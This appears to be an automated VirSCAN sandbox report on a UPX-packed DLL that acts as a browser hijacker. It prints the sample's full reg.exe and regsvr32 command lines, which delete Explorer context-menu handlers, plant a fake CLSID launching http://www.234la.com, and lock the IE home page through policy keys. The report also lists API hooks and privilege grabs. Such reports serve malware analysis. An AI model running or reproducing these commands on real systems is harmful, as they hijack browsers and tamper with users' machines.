VirSCAN

1. You can upload any file, but there is a 20Mb limit per file.
2. VirSCAN supports RAR/ZIP decompression, but the archive must contain fewer than 20 files.
3. VirSCAN can scan password-protected archives when the password is 'infected' or 'virus'.


File information
Safety rating: 21
Behavior list
Basic Information
MD5: efd7a3d47e6e9df9141c098e0eaeab74
File type: DLL
Production company:
Version: 1.0.0.0 --- 1.0.0.0
Shell or compiler information: PACKER: UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
Subfile information: upx_c_20513af2dumpFile / a4b411603516794b05cd9a277857544c / DLL
Key behavior
Behavior description: Map file with write access
details: CiceroSharedMemDefaultS-*
Behavior description: DLL sample (x86)
details: N/A
Behavior description: Modify registry_IE home page
details: \REGISTRY\USER\S-*\Software\Microsoft\Internet Explorer\Main\Start Page
Behavior description: Modify registry_disable changing IE home page
details: \REGISTRY\USER\S-*\Software\Policies\Microsoft\Internet Explorer\control Panel\HomePage
Process behavior
Behavior description: Create process with hidden window
details: ImagePath = , CmdLine = cmd /c regsvr32 /u /s igfxpph.dll & reg delete hkey_classes_root\directory\background\shellex\contextmenuhandlers /f & reg add hkey_classes_root\directory\background\shellex\contextmenuhandlers\new /ve /d {d969a300-e7ff-11d0-a93b-00a0c9
Behavior description: Create process
details: ImagePath = C:\WINDOWS\system32\CMD.exe, CmdLine = CMD /C regsvr32 /u /s igfxpph.dll & reg delete HKEY_CLASSES_ROOT\Directory\Background\shellex\ContextMenuHandlers /f & reg add HKEY_CLASSES_ROOT\Directory\Background\shellex\ContextMenuHandlers\new /ve /d {D96
ImagePath = C:\WINDOWS\system32\regsvr32.exe, CmdLine = regsvr32 /u /s igfxpph.dll
ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = reg delete HKEY_CLASSES_ROOT\Directory\Background\shellex\ContextMenuHandlers /f
ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = reg add HKEY_CLASSES_ROOT\Directory\Background\shellex\ContextMenuHandlers\new /ve /d {D969A300-E7FF-11d0-A93B-00A0C90F2719}
ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = reg add HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000001}
ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = reg add HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000001}\InProcServer32
ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = reg add HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000001}\InProcServer32 /ve /t reg_expand_sz /d C:\WINDOWS\system32\shdocvw.dll /f
ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = reg add HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000001}\Instance
ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = reg add HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000001}\Instance /v CLSID /t reg_sz /d {3f454f0e-42ae-4d7c-8ea3-328250d6e272} /f
ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = reg add HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000001}\Instance\InitPropertyBag
ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = reg add HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000001}\Instance\InitPropertyBag /v Param1 /t reg_sz /d http://www.234la.com /f
ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = reg add HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000001}\Instance\InitPropertyBag /v command /t reg_sz /d 360安全浏览器上网 /f
ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = reg add HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000001}\Instance\InitPropertyBag /v method /t reg_sz /d ShellExecute /f
ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = reg add HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000001}\Instance\InitPropertyBag /v CLSID /t reg_sz /d {13709620-C279-11CE-A49E-444553540000} /f
ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = reg add HKEY_CLASSES_ROOT\Directory\Background\shellex\ContextMenuHandlers\{00000000-0000-0000-0000-000000000001}
Behavior description: Enumerate processes
details: N/A
File behavior
Behavior description: Map file with write access
details: CiceroSharedMemDefaultS-*
Behavior description: Search for files
details: FileName = C:\Documents and Settings\Administrator\桌面\*.*
FileName = C:\WINDOWS
FileName = C:\WINDOWS\system32
FileName = C:\WINDOWS\system32\CMD.exe
FileName = C:\WINDOWS\system32\cmd.exe
FileName = C:\WINDOWS\system32\regsvr32.*
FileName = C:\WINDOWS\system32\regsvr32.COM
FileName = C:\WINDOWS\system32\regsvr32.EXE
FileName = C:\WINDOWS\system32\regsvr32.exe
FileName = C:\WINDOWS\system32\reg.*
FileName = C:\WINDOWS\system32\reg.COM
FileName = C:\WINDOWS\system32\reg.EXE
FileName = C:\WINDOWS\system32\reg.exe
Registry behavior
Behavior description: Modify registry_system context menu
details: \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\Background\shellex\ContextMenuHandlers\new\
Behavior description: Modify registry_Group Policy
details: \REGISTRY\USER\S-*\Software\Policies\Microsoft\Internet Explorer\Main\Start Page
\REGISTRY\USER\S-*\Software\Policies\Microsoft\Internet Explorer\Main\Search Bar
\REGISTRY\USER\S-*\Software\Policies\Microsoft\Internet Explorer\Main\Search Page
\REGISTRY\USER\S-*\Software\Policies\Microsoft\Internet Explorer\Main\Default_Page_URL
Behavior description: Modify registry_IE key properties
details: \REGISTRY\USER\S-*\Software\Microsoft\Internet Explorer\Main\Default_Page_URL
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Default_Page_URL
Behavior description: Modify registry_disable changing IE home page
details: \REGISTRY\USER\S-*\Software\Policies\Microsoft\Internet Explorer\control Panel\HomePage
Behavior description: Modify registry
details: \REGISTRY\MACHINE\SOFTWARE\Microsoft\InternetExplorer\Main\Start Page
\REGISTRY\USER\S-*\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
\REGISTRY\MACHINE\SYSTEM\ControlSet002\Hardware Profiles\0001\Software\Policies\Microsoft\Internet Explorer\Control Panel\Homepage
\REGISTRY\USER\S-*\Software\Microsoft\Multimedia\DrawDib\vga.drv 1920x973x16(565 0)
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-000000000001}\InProcServer32\
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-000000000001}\Instance\CLSID
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-000000000001}\Instance\InitPropertyBag\Param1
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-000000000001}\Instance\InitPropertyBag\command
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-000000000001}\Instance\InitPropertyBag\method
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-000000000001}\Instance\InitPropertyBag\CLSID
Behavior description: Delete registry key_system context menu
details: \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\Background\shellex\ContextMenuHandlers\New
\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\Background\shellex\ContextMenuHandlers
Behavior description: Modify registry_IE home page
details: \REGISTRY\USER\S-*\Software\Microsoft\Internet Explorer\Main\Start Page
Other behavior
Behavior description: Create mutex
details: CTF.LBES.MutexDefaultS-*
CTF.Compart.MutexDefaultS-*
CTF.Asm.MutexDefaultS-*
CTF.Layouts.MutexDefaultS-*
CTF.TMD.MutexDefaultS-*
CTF.TimListCache.FMPDefaultS-*MUTEX.DefaultS-*
SHIMLIB_LOG_MUTEX
Behavior description: Inline hook
details: C:\WINDOWS\system32\GDI32.dll--->ExtTextOutA Offset = 0x0
C:\WINDOWS\system32\GDI32.dll--->ExtTextOutW Offset = 0x0
C:\WINDOWS\system32\USER32.dll--->GetWindowLongA Offset = 0x0
C:\WINDOWS\system32\USER32.dll--->SetWindowLongA Offset = 0x0
C:\WINDOWS\system32\USER32.dll--->SetWindowLongW Offset = 0x0
C:\WINDOWS\system32\USER32.dll--->GetWindowLongW Offset = 0x0
C:\WINDOWS\system32\USER32.dll--->BeginPaint Offset = 0x0
C:\WINDOWS\system32\USER32.dll--->EndPaint Offset = 0x0
C:\WINDOWS\system32\USER32.dll--->GetDC Offset = 0x0
C:\WINDOWS\system32\USER32.dll--->GetWindowDC Offset = 0x0
C:\WINDOWS\system32\USER32.dll--->ReleaseDC Offset = 0x0
C:\WINDOWS\system32\USER32.dll--->WindowFromDC Offset = 0x0
C:\WINDOWS\system32\USER32.dll--->GetScrollInfo Offset = 0x0
C:\WINDOWS\system32\USER32.dll--->GetScrollPos Offset = 0x0
C:\WINDOWS\system32\USER32.dll--->GetScrollRange Offset = 0x0
Behavior description: DLL sample (x86)
details: N/A
Behavior description: Acquire system privileges
details: SE_LOAD_DRIVER_PRIVILEGE
SE_DEBUG_PRIVILEGE
Run screenshot